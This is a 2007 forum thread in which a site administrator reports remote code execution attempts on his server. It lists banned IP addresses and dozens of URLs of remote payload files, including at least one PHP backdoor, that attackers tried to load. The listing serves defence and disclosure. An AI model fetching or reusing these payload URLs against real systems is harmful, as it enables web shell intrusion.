Little Bastards

Basic General Forum. Topics may be many and varied

Moderators: georg, suziecue, JaxHot

Little Bastards

Postby peg » Tue Sep 18, 2007 4:00 pm

So, it seems that someone is trying some remote code execution on our server. I don't know for what purpose (obviously no good) but I have banned the following IP Addresses.

Code: Select all
195.139.204.159
198.202.31.141
200.207.39.241
202.123.27.136
202.134.73.251
203.32.125.78
204.11.233.120
206.174.196.12
209.160.33.149
209.31.122.242
211.108.60.242
212.241.199.126
213.189.224.45
213.207.108.27
213.246.39.80
216.117.166.78
216.120.237.150
217.149.150.29
217.160.248.226
217.199.176.169
218.38.13.189
218.38.18.201
220.95.230.123
222.124.175.50
58.137.13.2
58.71.35.204
61.100.0.185
62.113.110.18
62.75.164.177
64.13.250.115
64.20.40.147
64.200.24.130
64.34.247.16
64.79.214.81
65.126.237.102
66.109.18.84
66.178.16.210
66.230.196.115
66.230.196.5
66.46.176.233
67.18.16.82
67.18.233.58
68.58.73.97
70.84.183.58
70.86.11.210
72.233.14.145
72.29.73.59
72.37.212.31
72.55.164.50
72.9.155.230
74.220.202.19
74.52.215.178
80.249.117.82
81.168.228.204
81.21.73.27
82.165.33.50
82.57.96.100
83.12.231.38
85.214.79.169
87.106.131.186
87.106.134.179
87.106.19.184


These IP Addresses themselves may not be the culprits, but they are then being exploited by those culprits. So I needed to resolve it and that was ONE of the things I have done.

These IP Addresses were trying to launch any one of the following files (many of which have been shut down)
Code: Select all

http://71.102.93.10/WTS/bin/hak/id.txt
http://72.143.157.159/x.asc/r7
http://barcamp.org.uk/bn
http://br.geocities.com/jetynn/rootlab.jpg
http://darkness.ws/xpl/bot/safe.txt
http://glddemo.in/geeklog/logs/data.txt
http://h1.ripway.com/babi/cmd.txt
http://h1.ripway.com/babi/safe.txt
http://h1.ripway.com/logpar/echo.txt
http://h1.ripway.com/MrHappy/x.txt
http://jkjk.site.voila.fr/CMD.txt
http://manxdate.com/id_img/about.gif
http://ngrd.awardspace.com/cmd.txt
http://paginas.terra.com.br/lazer/cezinha/id.txt
http://pucorp.t5.com.br/cmd.txt
http://svurology.com/images/avatars/uploads/id.txt
http://trezze.ezua.com/scan_BoT/id.txt
http://usuarios.arnet.com.ar/alvarezluque/safe.txt
http://usuarios.arnet.com.ar/larry123/safe.txt
http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc
http://www.55thinking.com/doc/echo.txt
http://www.aniversaris.info/images/help.txt
http://www.beramar.xpg.com.br/id.txt
http://www.freewebtown.com/liviupustiu/safe.txt
http://www.freewebtown.com/liviupustiu/u.txt
http://www.h7host.xpgplus.com.br/id.txt
http://www.h7host.xpgplus.com.br/r6.txt
http://www.homedv.net/bht.txt
http://www.mfilter.us/mf/id.txt
http://www.mikeboller.com/cmd.txt
http://www.mohaa.team-empire.info/includes/read.txt
http://www.okgopchat.com/forum/id.txt
http://www.sufcdb.co.uk/comp/mic.txt
http://www.the-esao.com/imag/stringa.txt
http://www.tracanna.net//components/com_poll/images/id
http://www.tracanna.net//components/com_poll/images/id.txt
http://www.wisdom-creation.com/cmd.txt
http://www.youngpods.org/images/data.txt


Now before you go investigating those links... BE WARNED that at least one of them is actually a link to a virus. Which is a PHP Backdor. If you are running PHP on a Windows Machine, you will be susceptible to it.

Fortunately, it appears that they have not been able to gain access to the resources they wanted, but I am still going through logs. The down side is that they have a net effect of shutting down the MySQL Server (creating errors in the various applications.)
- peg -

-- eschew obfuscation!! --
If we were able to help you please consider making a donation to support this site.
Donation button at the top of page.
User avatar
peg
Site Admin
Site Admin
 
Posts: 827
Joined: Sun Feb 09, 2003 6:25 am
Location: United States

Postby peg » Thu Sep 27, 2007 1:34 am

So now the attack has shifted modes. I have blocked the "Exploit" that was being used to shut down the MySQL Server. So now they are trying to exploit a vulnerability in the Apache.

So in the process of "Patching" things, We have expanded the list of Blocked IP Addresses. The list is too large to post but suffice it to say, We are keeping up with them, but occasionally, they get ahead and the site crashes.

There are mechanisms in place to attempt to recover from those crashes, but it's on a timed event (trying to balance the performance with reliability)

Please be patient. This only goes to show that we are doing good and hurting them.

Everyone keep up the good work.
- peg -

-- eschew obfuscation!! --
If we were able to help you please consider making a donation to support this site.
Donation button at the top of page.
User avatar
peg
Site Admin
Site Admin
 
Posts: 827
Joined: Sun Feb 09, 2003 6:25 am
Location: United States


Return to General

Who is online

Users browsing this forum: No registered users and 3 guests

cron